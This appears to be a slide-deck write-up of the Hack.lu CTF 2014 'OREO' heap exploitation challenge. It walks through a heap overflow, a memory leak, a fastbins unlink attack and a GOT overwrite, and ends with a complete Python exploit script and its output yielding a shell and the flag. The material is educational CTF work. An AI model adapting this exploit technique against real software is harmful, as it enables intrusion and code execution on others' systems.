  • 1. OREO Hack.lu CTF 2014 - Exploiting 400 points you0708@YOKARO-MON
  • 2. The Original Rifle Company has the most finest rifles and revolvers in whole Rodeo City! However their buildings are pretty secure, so your only chance to get into their offices is by hacking through the Original Rifle Ecommerce Online (OREO) System and steal all those pretty weapons from the inside! Makes sense right? Good luck! nc wildwildweb.fluxfingers.net 1414
  • 3. Welcome to the OREO Original Rifle Ecommerce Online System! ,______________________________________ |_________________,----------._ [____] -,__ __....-----===== (_(||||||||||||)___________/ | `----------' OREO [ ))"-, | "" `, _,--....___ | `/ """" What would you like to do? 1. Add new rifle 2. Show added rifles 3. Order selected rifles 4. Leave a Message with your Order 5. Show current stats 6. Exit! Action: 1 Rifle name: hogehoge Rifle description: sample rifle Action: 2 Rifle to be ordered: =================================== Name: hogehoge Description: sample rifle =================================== Action:
  • 5. Surface Analysis • file • ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, stripped • checksec • CANARY : ENABLED • FORTIFY : disabled • NX : ENABLED • PIE : disabled • RELRO : disabled
  • 6. Dynamic Analysis • We can order rifles 1. Select rifles you want to order • Need to specify rifle name & description 2. Submit an order for selected rifles • Can leave a message
  • 7. Static Analysis • Reverse engineering using IDA
  • 8. • Data structure of the rifle Static Analysis
  • 9. Static Analysis • aa_rifle (Size = 0x38) Offset Size Name 0x00 0x19 description 0x19 0x1B name 0x34 4 last Fastbins
  • 10. Reference: Heap Chunk • http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
  • 11. Reference: Heap Chunk • http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
  • 12. Understanding Rifle Management using GDB • After adding 2 rifles • After order size + flag, fd, bk “A” “a” “b”“B” It can be found from 0x0804A288 that stores address of last rifle
  • 13. • After adding 2 rifles Heap Chunk 2 Chunk 1 Understanding Rifle Management Rifle 2 0x00000041 (size + flag) (prev size) Rifle 1 description name 0 0x00000041 (size + flag) (prev size) description name address of Rifle 1
  • 14. • After order Heap Chunk 2 Chunk 1 Understanding Rifle Management 0x00000041 (size + flag) (prev size) 0x00000041 (size + flag) (prev size) 0x00000000 (fd) 0x00000000 (bk) address of Chunk 2 (fd) 0x00000000 (bk)
  • 15. Vulnerability • Add command 1. Alloc 0x38 bytes heap (new rifle) 2. Connect to previous rifle 3. Input rifle’s name (max 0x38 bytes) 4. Input rifle’s description (max 0x38 bytes) 5. Add rifle counter
  • 16. Vulnerability • You can do buffer-overflow as below Rifle description name last “A” * 0x38
  • 19. Memory Leakage • Overwrite last rifle address Heap Chunk 1 Rifle 1 description name 0 0x41 (size + flag) (prev size) Target data You can read target data as rifle’s description using show command “A” * 0x1B
 + address of target data
  • 20. Fastbins Unlink Attack • Breaking fastbins chain Heap Freed
 Chunk 2 Reallocated Chunk 1 0x42 (size + flag) (prev size) 0x41 (size + flag) (prev size) address of Chunk 1 bk Rifle 3 description name 0 “A” * 0x1F
 + 0
 + 0
 + 0x41
 + address of target memory Target memory It used as a heap chunk after re- allocating Chunk 2 Add a rifle after free 2 rifles
  • 21. Reference: Fastbins Unlink Attack • http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200 To avoid size check failure, you have to put a correct value into “size” (In this case, the value must be 0x41)
  • 22. Making Fake Freed Chunk • You have to find the area that can be set to 0x41 when re-allocation Chunk 0x41 (size + flag) (prev size) fd bk You can use 0x804A2A0 as a freed chunk because rifle_counter can be set 0x41
  • 23. Exploitation Process 1. Leak address of ibc functions 2. Calc address of “system” 3. Add rifles until rifle counter is 0x3F 4. Order rifles (free fastbins) 5. Breaking fastbins chain by adding a rifle 6. Allocate 0x804A2A0 as a heap chunk by adding a rifle 7. Overwrite GOT by leaving message 8. Get shell
  • 24. Exploitation Process 2. Calc address of “system” • See http://pastebin.com/9vq38BYH
  • 25. Exploitation Process 3. Add rifles until rifle counter is 0x3F 4. Order rifles (Free fastbins) while rifle_count < 0x3e: cmd_add("A"*27+p(0), "B") cmd_add("A", "B") cmd_order() To avoid to create many fast chunks,
 the “last” should be 0x00000000
  • 26. Exploitation Process 6. Allocate 0x804A2A0 as a heap chunk by adding a rifle • Before allocation, rifle counter will be 0x41 • Its description must be addr of strlen@got Address Before After 0x804A2A0 orderd_counter prev_size 0x00000000 0x804A2A4 rifle_counter size + flag 0x00000041 0x804A2A8 lpMsg description address of strlen@got 0x804a2c1 msg_buf + 1 name “foobar" 0x804a2dc msg_buf + 0x1C last Unknown strlen@got is will be call the program after adding a rifle/leaving a message
  • 27. Exploitation Process 7. Overwrite strlen@got by leaving a message • Now lpMsg points to strlen@got • Message should be p(libc_system) + “;sh x00" • “;shx00" will be used in next step
  • 28. Exploitation Process 8. Get shell • Overwrote strlen will be called after adding the rifle • Its argument is the message:
 p(libc_system) + “;shx00” • It means the program will call
 system(“x??x??x??x??;sh”)
  • 29. oreo.py s, f = sock("wildwildweb.fluxfingers.net", 1414) got_malloc = 0x0804A244 got_strlen = 0x0804A250 p_order_msg = 0x0804A2A8 rifle_count = 0 ready_action() cmd_add("A"*27+p(got_malloc-0x19), "B"*25) libc_malloc = u(cmd_show()[1][0][:4]) print("[*] got libc malloc: 0x%08x" % libc_malloc) libc_system = libc_malloc - 0x0007d950 + 0x00042af0 print("[*] got libc system: 0x%08x" % libc_system) while rifle_count < 0x3e: cmd_add("A"*27+p(0), "B") cmd_add("A", "B") cmd_order() cmd_add("A"*27+p(0)+p(0)+p(0x41)+p(p_order_msg-8), "B") cmd_add("A", "B") cmd_add("A", p(got_strlen)) cmd_msg(p(libc_system) + ";shx00", noread=True) print("[*] got shell") shell(s)
  • 30. $ python oreo.py [*] rifle count: 0x01 [*] got libc malloc: 0xf76a2950 [*] got libc system: 0xf7667af0 [*] rifle count: 0x02 [*] rifle count: 0x03 (snip.) [*] rifle count: 0x3f [*] ordered [*] rifle count: 0x40 [*] rifle count: 0x41 [*] rifle count: 0x42 [*] got shell ls fl4g oreo cat fl4g flag{FASTBINS_ARE_NICE_ARENT_THEY}